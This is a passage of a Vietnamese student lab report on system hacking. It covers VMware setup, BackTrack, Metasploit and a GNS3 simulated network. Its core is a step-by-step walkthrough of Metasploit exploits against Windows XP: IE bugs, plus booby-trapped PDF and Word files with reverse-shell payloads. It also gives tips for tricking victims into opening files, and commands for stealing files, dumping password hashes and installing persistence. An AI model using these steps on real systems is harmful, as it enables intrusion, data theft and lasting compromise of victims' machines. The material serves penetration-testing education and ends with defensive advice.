  • 17. System Hacking VM tự động thực hiện việc kiểm tra. Cách tạo nên các máy ảo từ VMware: Để sử dụng VMware đầu tiên chúng ta cần tạo nên một máy ảo, nơi mà chúng ta sẽ dùng để cài đặt nên các hệ điều hành. Chúng ta có thể tuỳ chọn dung lượng ổ cứng, dung lượng RAM, cách kết nối mạng của máy ảo… Việc tiếp theo cần làm là cài đặt nên một hệ điều hành trên máy ảo đó. Hiện tại, VMware hỗ trợ cài đặt rất nhiều dạng hệ điều hành. Chúng ta có thể cài các phiên bản của Windows, Linux, Unix… trên các máy ảo VMware. Việc cài đặt hệ điều hành trên máy ảo hoàn toàn tương tự như cách cài đặt trên các máy thật. 2. Chia sẻ tài nguyên của các máy ảo: Chia sẻ CPU và RAM: Các máy ảo sẽ chia sẻ CPU và RAM của máy tính thật. Để đảm bảo hệ thống có thể chạy tốt, yêu cầu máy tính thật phải có cấu hình tương đối cao, khoảng 1GB RAM để có thể chạy đồng thời 4, 5 máy ảo. Chia sẻ ổ cứng: Khi tạo ra các máy ảo, chúng ta sẽ tạo ra một ổ cứng dành riêng cho máy ảo nằm trên máy thật. Ổ cứng ảo này được tạo trên vùng đĩa trống của ổ đĩa thật, do đó không ảnh hưởng đến các dữ liệu đang có trên ổ đĩa thật. Chúng ta có thể tuỳ chọn dung lượng của ổ cứng này, có thể ấn định ngay dung lượng hoặc cũng có thể để dung lượng của ổ cứng này là động, sẽ thay đổi tuỳ theo quá trình sử dụng của chúng ta sau này. Chia sẻ card mạng: Sau khi cài đặt lên, VMware sẻ tạo nên 2 card mạng VMware 1 và VMware 8 trên máy thật và máy thật có thể sử dụng 2 card mạng này để kết nối với các máy ảo. Khi lựa chọn cấu hình mạng cho các máy ảo, ta có thể chọn một trong các chế độ sau: – Bridged networking: Card mạng của máy ảo sẽ được gắn trực tiếp với Huỳnh Minh Trí Page 16
  • 18. System Hacking card mạng của máy thật (sử dụng switch ảo VMnet0). Lúc này, máy ảo sẽ đóng vai trò như một máy trong mạng thật, có thể nhận DHCP từ mạng ngoài, hoặc đặt IP tĩnh cùng dải với mạng ngoài để giao tiếp với các máy ngoài mạng hoặc lên Internet. Cấu trúc mạng Bridged Networking – NAT: Máy ảo được cấu hình NAT sẽ sử dụng IP của máy thật để giao tiếp với mạng ngoài. Các máy ảo được cấp địa chỉ IP nhờ một DHCP ảo của VMware. Lúc này, các máy ảo sẽ kết nối với máy thật qua switch ảo VMnet8, và máy thật sẽ đóng vai trò NAT server cho các máy ảo. Cấu trúc mạng NAT – Host-only Networking: Khi cấu hình máy ảo sử dụng host-only networking, máy ảo sẽ được kết nối với máy thật trong một mạng riêng thông qua Switch ảo VMnet1. Địa chỉ của máy ảo và máy thật trong mạng host-only có thể được cấp bởi DHCP ảo gắn liền với Switch ảo Vmnet1 hoặc có thể đặt địa chỉ IP tĩnh cùng dải để kết nối với nhau. Huỳnh Minh Trí Page 17
  • 19. System Hacking Cấu trúc mạng Host-Only – Ngoài các kết nối trên, ta có thể sử dụng các switch ảo trong VMware để kết nối các máy ảo thành một hệ thống như mong muốn. Khi cài đặt lên, VMware tạo sẵn cho chúng ta 10 Switch ảo từ VMnet0 đến VMnet9. Ngoài các Switch ảo VMnet0 (dùng cho mạng Bridged Networking), VMnet8 (dùng cho mạng Nat Networking) và VMnet1 (dùng cho mạng Host-Only Networking), chúng ta còn 7 Switch ảo khác để thực hiện việc kết nối các máy ảo. Chúng ta có thể đặt IP động trên các máy nối với các Switch này để nhận DHCP ảo, hoặc có thể đặt IP tĩnh cùng dải cho các máy này đảm bảo chúng kết nối được với nhau. Chia sẻ ổ đĩa CD-ROM: Các máy ảo có thể sử dụng ổ CD-ROM của máy thật. Ngoài ra, ta có thể dùng một file ISO để đưa vào ổ CD-ROM của máy ảo, lúc này máy ảo sẽ nhận file ISO giống như một đĩa CD-ROM trong ổ đĩa của mình. 3. Sử dụng Snapshot: Snapshot một máy ảo cho phép ta lưu lại trạng thái của máy ảo tại thời điểm đó. Snapshot sẽ lưu lại thông tin về ổ cứng, Ram và các Setting trên máy ảo. Sau khi lưu snapshot, chúng ta có thể quay trở lại trạng thái của máy ảo bất cứ lúc nào. Huỳnh Minh Trí Page 18
  • 20. System Hacking VMware cho phép chúng ta lưu nhiều snapshot của máy ảo, vì thế người dùng có thể sử dụng một máy ảo vào nhiều ngữ cảnh khác nhau, tiết kiệm thời gian cho việc cấu hình. Chẳng hạn với một máy ảo A, trong một bài lab ta muốn nó là một máy chủ Domain Controller, nhưng trong bài lab khác ta muốn xấy dựng nó thành một máy chủ ISA. Để giải quyết vấn đề này, chúng ta có thể lưu snapshot của máy A tại thời điểm nó là domain controller, sau đó cấu hình nó thành một máy chủ ISA và lưu snapshot. Khi cần sử dụng máy ảo A với vai trò là một Domain Controller hay ISA, ta sẽ dùng trình quản lý Snapshot Manager để chuyển tới trạng thái mong muốn. PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 1. Hệ điều hành Backtrack 5 R3 Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10. Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau. Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor. Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Huỳnh Minh Trí Page 19
  • 21. System Hacking Backtrack 5 có thể được phân loại như sau: – Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. – Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. – Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). – Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. – Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này. – Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. – Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. – Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong Huỳnh Minh Trí Page 20
  • 22. System Hacking việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập. – Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này. – Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. – Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 2. Phần mềm Metasploit Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler, và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. Chúng ta có thể download chương trình tại www.metasploit.com Metasploit hỗ trợ nhiều giao diện với người dùng: – Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng Huỳnh Minh Trí Page 21
  • 23. System Hacking các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn. – Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web. – Command line interface: dùng msfcli. Metasploit Enviroment: – Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits. – Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và sẽ được load trở lại khi user interface được thực hiện. Sử dụng Metasploit Framework: 2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác Show exploits: xem các module exploit mà framework có hỗ trợ. Use exploit_name: chọn module exploit. Info exploit_name: xem thông tin về module exploit. Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các module trên www.metasploit.com hoặc qua lệnh msfupdate hoặc svnupdat/opt/metasploit/msf3/ Huỳnh Minh Trí Page 22
  • 24. System Hacking 2.2 Cấu hình Module exploit đã chọn: show options: Xác định những options nào cần cấu hình. set: cấu hình cho những option của module đó. Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds. 2.3 Verify những options vừa cấu hình: check: kiểm tra xem những option đã được set chính xác chưa. 2.4 Lựa chọn target: show targets: những target được cung cấp bởi module đó. set: xác định target nào. 2.5 Lựa chọn payload: show payloads: liệt kê ra những payload của module exploit hiện tại. info payload_name: xem thông tin chi tiết về payload đó. set payload payload_name: xác định payload module name. Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó. show advanced: xem những advanced options của payload đó. 2.6 Thực thi exploit: exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác. 3. Sơ đồ tổng quan hệ thống mạng LAN Huỳnh Minh Trí Page 23
  • 25. System Hacking Sơ đồ tổng quan hệ thống mạng LAN Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng. Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc Huỳnh Minh Trí Page 24
  • 26. System Hacking gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OSX. Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus. Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống, Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor … 4. Xâm nhập và khai thác Windows XP Hacker: – Hệ điều hành Back Track 5 – Địa chỉ IP: 10.10.10.2 4.1 Khai thác lổ hỏng Ms10-090 a) Mô tả: Lỗi này nằm trong cơ chế thực hiện mã hóa phiên làm việc của ứng dụng web ASP.NET, dẫn tới việc kẻ tấn công có thể thăm dò để tìm ra khóa giải mã trong một thời gian ngắn. Hiện tại chưa có bản vá chính thức cho lỗi này. b) Phần mềm bị ảnh hưởng: Tất cả các hệ điều hành dùng các phiên bản IE6 , IE7 và IE8 c) Cách thự hiện tấn công: Huỳnh Minh Trí Page 25
  • 27. System Hacking Khởi động msfconsole tử cửa sổ terminal của BackTrack: > msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > search ms10_090 > use exploit/windows/browser/ms10_090_ie_css_clip > show options > set srvhost 10.10.10.2 > set lhost 0.0.0.0 > set PAYLOAD windows/meterpreter/reverse_tcp > exploit BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80iT1b69v). Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. Tiến hành khai thác máy nạn nhân > sessions >sessions –i 1 4.2 Khai thác lổ hỏng Ms10-042 a) Mô tả: Lỗ hổng này có thể cho phép thực thi mã từ xa nếu người dùng xem một Huỳnh Minh Trí Page 26
  • 28. System Hacking trang web thiết kế đặc biệt bằng cách sử dụng một trình duyệt web hoặc nhấp vào một liên kết thiết kế đặc biệt trong một thông báo e-mail. b) Phần mềm bị ảnh hưởng: Windows XP Service Pack 2 and Windows XP Service Pack 3 Windows XP Professional x64 Edition Service Pack 2 Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems c) Cách thực hiện tấn công: Khởi động msfconsole tử cửa sổ terminal của BackTrack: > msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > search ms10_042 > use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec > show options > set srvhost 10.10.10.2 > set lhost 0.0.0.0 > set PAYLOAD windows/meterpreter/reverse_tcp > exploit BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần Huỳnh Minh Trí Page 27
  • 29. System Hacking nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. Tiến hành khai thác máy nạn nhân > sessions > sessions –i 1 4.3 Khai thác lổ hỏng Ms12-004 a) Mô tả: Các lỗ hổng có thể cho phép thực thi mã từ xa nếu người dùng mở một tập tin phương tiện truyền thông thiết kế đặc biệt. Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền sử dụng giống như người dùng địa phương. Người dùng có tài khoản được cấu hình để có quyền sử dụng ít hơn trên hệ thống có thể được ít ảnh hưởng hơn so với những người dùng hoạt động với người sử dụng quyền hành chính… b) Phần mềm bị ảnh hưởng: Windows XP Windows Server 2003 Windows Vista Windows Server 2008 Windows 7 Windows Server 2008 R2 c) Cách thực hiện tấn công Khởi động msfconsole tử cửa sổ terminal của BackTrack >msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > Search ms12_004 > use exploit/windows/browser/ms12_004_midi Huỳnh Minh Trí Page 28
  • 30. System Hacking > show options > set srvhost 10.10.10.2 > set lhost 0.0.0.0 > set payload windows/meterpreter/reverse_tcp >exploit BackTrack sẽ tạo ra một link chứa mã độc (http://10.10.10.2:80). Chỉ cần nạn nhân nhấp chuột vào link trên thì BackTrack sẽ tự dộng gửi mã độc sang máy nạn nhân và sau đó có thể xem thông tin, chiến quyền của máy nạn nhân đó. Tiến hành khai thác máy nạn nhân > sessions > sessions –i 1 4.4 Khai thác lổ hỏng file PDF qua Adobe Reader 9.x a) Mô tả: Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải file…) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị “nhiễm độc”. b) Phần mềm bị ảnh hưởng: Adobe Reader 9.x chạy trên nền Windows XP SP3 Huỳnh Minh Trí Page 29
  • 31. System Hacking c) Cách thực hiện tấn công: Điều kiện: Victim phải cài đặt phần mền Adobe Reader 9.x Khởi động msfconsole tử cửa sổ terminal của BackTrack. >msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > Search nojs > use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs > show options > set filename test.pdf (đây là tên do mình tự đặt với cú pháp *.pdf) > set payload windows/meterpreter/reverse_tcp > set lhost 0.0.0.0 > set lport 5555 >exploit Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file pdf có chứa mã độc, file sẽ được lưu tại root./msf4/test.pdf Tiếp tục thực hiện các bước sau: > use multi/handler > set payload windows/meterpreter/reverse_tcp > set lhost 0.0.0.0 Huỳnh Minh Trí Page 30
  • 32. System Hacking > set lport 5555 > exploit Tới đây chúng ta bắt đầu gửi file pdf vừa tạo cho máy nạn nhân, khi nạn nhân mở file backtrack sẽ gửi mã độc và chiếm được quyền sử dụng máy nạn nhân. 4.5 Khai thác lỗ hỏng Ms12-027 a) Mô tả: Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .doc và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một web server giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, …) b) Phần mềm bị ảnh hưởng: Microsoft Office 2003 Microsoft Office 2007 Microsoft Office 2010 (ngoại trừ phiên bản x64-based editions) Microsoft SQL Server 2000 Analysis Services Microsoft SQL Server 2000 (ngoại trừ phiên bản Itanium-based editions) Microsoft SQL Server 2005 (đối với Microsoft SQL Server 2005 Express Edition chỉ thực hiện được trên Advanced Services) Microsoft SQL Server 2008 Microsoft SQL Server 2008 R2 Microsoft BizTalk Server 2002 Microsoft Commerce Server 2002 Microsoft Commerce Server 2007 Microsoft Commerce Server 2009 Microsoft Commerce Server 2009 R2 Microsoft Visual FoxPro 8.0 Microsoft Visual FoxPro 9.0 Visual Basic 6.0 Runtime… Huỳnh Minh Trí Page 31
  • 33. System Hacking c) Cách thực hiện tấn công: Điều kiện: Victim phải cài đặt phần mềm Microsoft Office Word 2007 Khởi động msfconsole tử cửa sổ terminal của BackTrack. > msfconsole Khai báo lỗ hổng sử dụng và thiết đặt options: > search ms12_027 > use exploit/windows/fileformat/ms12_027_mscomctl_bof > show options > set filename test.doc (đây là tên do mình tự đặt với cú pháp *.pdf) > set payload windows/meterpreter/reverse_tcp > set lhost 0.0.0.0 > set lport 5555 > exploit Sau khi tiến hành xong các bước trên, backtrack sẽ tạo 1 file word có chứa mã độc, file sẽ được lưu tại root./msf4/test.doc Tiếp tục thực hiện các bước sau: > use exploit/multi/handler >set payload /windows/meterpreter/reverse_tcp > set lhost 0.0.0.0 > exploit Huỳnh Minh Trí Page 32
  • 34. System Hacking Sau khi thực hiện các bước trên, chúng ta bắt đầu gửi file word qua cho máy nạn nhân, khi nạn nhân mở file word backtrack sẽ tự động gửi mã độc qua và chúng ta có thể chiếm quyền sử dụng máy nạn nhân 4.6 Khai thác thông tin sau khi đã tấn công: Xem thông tin hệ thống: > getuid > sysinfo Tải lên và đánh cắp tài liệu – Tải file abc.txt tại Desktop của Back Track lên ổ C của XP > upload /root/Desktop/abc.txt C:/ – Đánh cắp file xyz.txt tại ổ C của XP và đem về Desktop của Back Track > download C:/xyz.txt /root/Desktop Lấy hashpass: > haskdump Khám phá ổ đĩa: meterpreter> shell – Chuyển dấu nhắc sang ổ đĩa C: > cd c: – Liệt kê tài nguyên trong ổ C: > dir Huỳnh Minh Trí Page 33
  • 35. System Hacking – Tạo thư mục abc trong ổ C: > md abc – Xóa thư mục abc trong ổ C: > rd abc – Xóa file abc.txt trong ổ C: > del abc.txt – Trở về meterpreter: > exit Giữ kết nối với Victim khi Victim mất mạng hay khởi động lại tại port 5555 > run persistence -A -S -U -X -i 1500 -P 5555 Huỳnh Minh Trí Page 34
  • 36. System Hacking PHẦN 4 : GNS3 VÀ MÔ PHỎNG HỆ THỐNG ĐƯỜNG MẠNG INTERNET 1. GNS3 là gì? GNS3 là 1 chương trình giả lập mạng có giao diện đồ họa cho phép bạn có thể giả lập các loại router Cisco sử dụng IOS (hệ điều hành của router) thật, ngoài ra còn có thể giả lập các thiết bị mạng khác như ATM, Frame Relay, Ethernet Switch, Pix Firewall… và đặt biệt có thể kết nối vào hệ thống mạng thật và sử dụng như thiết bị thật. GNS3 được phát triển dựa trên Dynamips và Dynagen để mô phỏng các dòng router 1700, 2600, 3600, 3700, 7200 có thể sử để triển khai các bài lab của CCNA,CCNP,CCIE nhưng hiện tại vẫn chưa mô phỏng Catalyst Switch. Ngoài ra, GNS3 còn có chức năng liên kết máy ảo với VMWare và kết nối Internet để thực hiện mô phỏng các sơ đồ mạng thực tế. 2.Mô phỏng mạng Internet để tấn công từ máy Backtrack tới máy XP: Mô hình mạng mô phỏng: Nhà Hacker: máy Backtrack nối với R1: 10.10.10.0/30 Nhà Victim: máy win XP nối với R2: 10.10.10.12/30 Mạng Internet: router ISP nối với R1: 10.10.10.4/30, R2: 10.10.10.8/30 và kết nối ra Internet: 203.164.4.2/24 Huỳnh Minh Trí Page 35
  • 37. System Hacking Cấu hình: R1: conf t int fa 0/0 ip add 10.10.10.1 255.255.255.252 ip nat inside int s 0/0 ip add 10.10.10.5 255.255.255.252 ip nat outside exit access-list 1 permit 10.10.10.0 0.0.0.3 ip nat inside source list 1 int s 0/0 overload ip nat inside source static tcp 10.10.10.2 3389 10.10.10.5 3389 ip nat inside source static tcp 10.10.10.2 4444 10.10.10.5 4444 Huỳnh Minh Trí Page 36
  • 38. System Hacking ip nat inside source static tcp 10.10.10.2 5555 10.10.10.5 5555 ip nat inside source static tcp 10.10.10.2 80 10.10.10.5 80 ip nat inside source static tcp 10.10.10.2 8080 10.10.10.5 8080 router ei 1 no auto network 10.0.0.0 passive-interface fa 0/0 router eigrp 1 network 10.10.10.4 0.0.0.3 no auto-summary R2: conf t int fa 0/0 ip add 10.10.10.13 255.255.255.252 ip nat inside int s 0/1 ip add 10.10.10.10 255.255.255.252 ip nat outside exit access-list 1 permit 10.10.10.12 0.0.0.3 ip nat inside source list 1 int s 0/1 overload router ei 1 no auto network 10.10.10.12 0.0.0.3 Huỳnh Minh Trí Page 37
  • 39. System Hacking network 10.10.10.8 0.0.0.3 ISP: conf t int s 0/0 ip add 10.10.10.6 255.255.255.252 int s 0/1 ip add 10.10.10.9 255.255.255.252 int f 0/0 ip add 203.162.4.2 255.255.255.252 router eigrp 1 no auto network 10.10.10.8 0.0.0.3 network 10.10.10.12 0.0.0.3 ip route 203.162.4.0 255.255.255.0 203.162.4.1 ip route 0.0.0.0 0.0.0.0 203.162.4.1 Sau khi cấu hình xong máy Backtrack và XP có thể ping được ra Internet nhưng không thể ping được lẫn nhau. Với mô hình này chúng ta có thể xem như đây là 2 đường mạng riêng biệt không biết địa chỉ của nhau như đường mạng Internet thực tế. Ta tiếp tục thực hiện tấn công từ máy Backtrack tới máy win XP. Huỳnh Minh Trí Page 38
  • 40. System Hacking PHẦN 5: TỔNG KẾT Với những kiểu tấn công hệ thống dựa trên những lỗi sai sót trong quá trình sử dụng máy tính hoặc các lỗi về bảo mật vật lý, có một số phương pháp nhằm giảm thiểu và phòng tránh việc Hacker đánh cắp Mật khẩu như sau: – Mật khẩu phải được đặt nhiều hơn 8 ký tự và phải là tổng hợp giữa chữ hoa, chữ thường, số và ký tự đặc biệt để các chương trình khó dò ra. – Cấu hình trong registry cho mật khẩu trong hệ thống windows chỉ được băm và lưu dưới dạng NTLM để các chương trình khó khăn để dò tìm – Người dùng admin nên xóa tập tin sam trong thư mục Windows/repair sau mỗi lần backup dữ liệu bằng rdisk. Trong quá trình sử dụng máy tính để truy cập Internet, cần lưu ý: – Không mở tập tin đính kèm thư điện tử có nguồn gốc không rõ ràng hoặc không tin cậy. – Chắc chắn rằng bạn có và đã bật hệ thống tường lửa cho hệ thống của mình. – Đảm bảo Windows của bạn được cập nhật thường xuyên, phần mềm bảo mật của bạn có chức năng cập nhật "live" (tự động cập nhật trực tuyến). – Cài đặt phần mềm diệt virut Internet Security. – Luôn sử dụng các bản Office có bản quyền để luôn được cập nhật v á lỗi và hỗ trợ kỹ thuật từ nhà cung cấp. Microsoft đã xây dựng một loạt các công cụ trong Windows để các nhà quản trị cũng như người dùng có kinh nghiệm có thể phân tích chiếc máy tính Huỳnh Minh Trí Page 39
  • 41. System Hacking của mình xem liệu nó có đang bị xâm phạm hay không. Một khi nghi ngờ máy tính của mình bị xâm nhập, người dùng có thể sử dụng các công cụ này để tự kiểm tra máy tính của mình khi có những biểu hiện đáng ngờ: WMIC, Lệnh net, Openfiles, Netstat, Find. PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT MỘT SỐ PHẦN MỀM 1. Cài đặt VMware Đầu tiên các bạn vào địa chỉ http://www.vmware.com để tải Vmware phiên bản mới nhất về cũng như là đăng ký bản quyền cho Vmware. Tiếp đó các bạn mở file cài đặt Vmware đã được tải về. Chương trình cài đặt sẽ bắt đầu sau khi load xong một số file quan trọng Huỳnh Minh Trí Page 40
  • 42. System Hacking Chọn Next Có 2 lựa chọn cho quá trình cài đặt: Typical hoặc Custom Huỳnh Minh Trí Page 41
  • 43. System Hacking – Typical: chọn nơi sẽ cài đặt và chọn Next để tiếp tục Huỳnh Minh Trí Page 42
  • 44. System Hacking – Custom: chọn các gói cài đặt thêm; nếu chọn gói debug Eclipse thì phải chọn cả 2 gói Java và C nếu không chương trình sẽ báo lỗi -> Chọn Next để tiếp tục Huỳnh Minh Trí Page 43
  • 45. System Hacking Lựa chọn nơi chương trình sẽ tạo shortcut -> Chọn Next Chọn Continue để bắt đầu cài đặt Huỳnh Minh Trí Page 44
  • 46. System Hacking Quá trình cài đặt bắt đầu … quá trình này có thể kéo dài từ 5′~10′ Huỳnh Minh Trí Page 45
  • 47. System Hacking Cài đặt hoàn tất chương trình sẽ yêu cầu đăng ký bản quyền, Chọn Next hoặc các bạn có thể bỏ qua bước này bằng cách Chọn Skip Kết thúc quá trình VMW7 sẽ yêu cầu khởi động lại máy tính. Có thể kô cần khởi động lại mà vẫn có thể khởi động được chương trình Huỳnh Minh Trí Page 46
  • 48. System Hacking Trong lần khởi động đầu tiên VMW sẽ muốn bạn xác nhận lại là có muốn sử dụng chương trình hay kô! Nếu có chọn Yes -> Chọn OK để xác nhận Đây là giao diện làm việc chính của chương trình Huỳnh Minh Trí Page 47
  • 49. System Hacking 2. Cài đặt máy ảo bằng VMware: Sau khi tải về và cài đặt trên máy tính bạn khởi động chương trình VMware bằng cách chọn đúp vào biểu tượng ngoài màn hình Desktop, và làm theo các bước sau: Từ màn hình chính bạn chọn Menu File > New > Virtual Machine… hoặc Ctrl+ N Huỳnh Minh Trí Page 48
  • 50. System Hacking Chọn Next Bạn chọn Typical để cài mặc định sau đó Chọn Next Huỳnh Minh Trí Page 49
  • 51. System Hacking Phần mềm hỗ trợ cho bạn rất nhiều hệ điều hành từ Windows đến Linux hoặc Sun Solaris... Bạn chọn hệ điều hành và phiên bản rồi Chọn Next để tiếp tục Ở đây tôi chọn cài hệ điều hành Windows XP 64 bít, bạn cũng có thể thay đổi thư mục lưu trữ tại Location, rồi Chọn Next để tiếp tục Huỳnh Minh Trí Page 50
  • 52. System Hacking Tại đây bạn nên chọn Use Brided Networking để cải đặt cho Card mạng của mình và Chọn Next để tiếp tục Tại đây bạn có thể thay đổi giá trị của ổ cứng trên máy ảo (Mặc định là 8Gb) và Huỳnh Minh Trí Page 51
  • 53. System Hacking Chọn Finish để kết thúc quá trình lựa chọn cấu hình máy ảo. Như vậy là quá trình lựa chọn cấu hình máy ảo kết thúc Huỳnh Minh Trí Page 52
  • 54. System Hacking Bạn cũng có thể thay đổi các thông số như dung lượng RAM, dương lượng ổ cứng ngay tại đây. Để thiết lập ổ CD-ROM cho máy ảo phục vụ cho cài đặt hệ điều hành bạn Chọn đúp vào ổ CD-ROM. – Nếu bạn muốn cài từ đĩa CD/DVD thì bạn tích chọn User phisical Driver và chọn Auto Detect – Nếu muốn cài từ file ISO có trong máy bạn tích chọn Use ISO image và tìm đến file ISO trên máy của bạn Huỳnh Minh Trí Page 53
